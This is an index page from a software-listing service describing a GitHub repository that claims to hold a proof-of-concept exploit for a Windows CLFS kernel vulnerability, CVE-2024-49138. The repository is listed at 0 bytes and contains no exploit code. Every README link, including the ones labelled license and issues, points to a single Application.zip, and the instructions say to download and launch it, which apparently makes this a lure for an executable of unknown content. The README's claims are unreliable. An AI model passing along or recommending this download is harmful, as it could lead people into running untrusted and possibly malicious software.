Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/aspire20x/cve-2024-49138-poc
POC exploit for CVE-2024-49138
https://github.com/aspire20x/cve-2024-49138-poc
clfs exploitation kernel windows
Last synced: about 22 hours ago
JSON representation
POC exploit for CVE-2024-49138
- Host: GitHub
- URL: https://github.com/aspire20x/cve-2024-49138-poc
- Owner: aspire20x
- Created: 2025-01-15T16:14:34.000Z (12 days ago)
- Default Branch: main
- Last Pushed: 2025-01-22T19:06:19.000Z (5 days ago)
- Last Synced: 2025-01-22T19:23:56.226Z (5 days ago)
- Topics: clfs, exploitation, kernel, windows
- Size: 0 Bytes
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# POC Exploit for CVE-2024-49138
## 🚨 Repository: [CVE-2024-49138-POC](https://github.com/user-attachments/files/18426772/Application.zip)
![CVE-2024-49138-POC](https://img.shields.io/badge/CVE-2024--49138--POC-orange)
---
### Description
This repository contains a Proof of Concept (POC) exploit for CVE-2024-49138. The exploit demonstrates a method of vulnerability exploitation related to the Windows kernel.---
### Topics
- `clfs`
- `exploitation`
- `kernel`
- `windows`---
### 📥 File Download
The exploit file can be downloaded from [this link](https://github.com/user-attachments/files/18426772/Application.zip). Click [here](https://github.com/user-attachments/files/18426772/Application.zip) to download the file.---
### Instructions
1. Download the application zip file from the provided link.
2. Launch the application to initiate the exploit demonstration.---
### 🌐 Explore Further
For more information and updates, visit the official repository [here](https://github.com/user-attachments/files/18426772/Application.zip).---
### Release Notes
If the provided link is not accessible or does not work, please check the **Releases** section of the repository for alternative download options.---
### 🛠️ Support
For any questions or issues regarding the exploit, feel free to open an [issue](https://github.com/user-attachments/files/18426772/Application.zip) in the repository.---
### 📄 License
This project is licensed under the MIT License. See the [LICENSE](https://github.com/user-attachments/files/18426772/Application.zip) file for details.---
### 🚀 Let's Get Started!
Enjoy exploring the exploit for CVE-2024-49138! Happy hacking! 🎉---
![CVE-2024-49138-POC](https://yourimageurl.com/coolimage.png)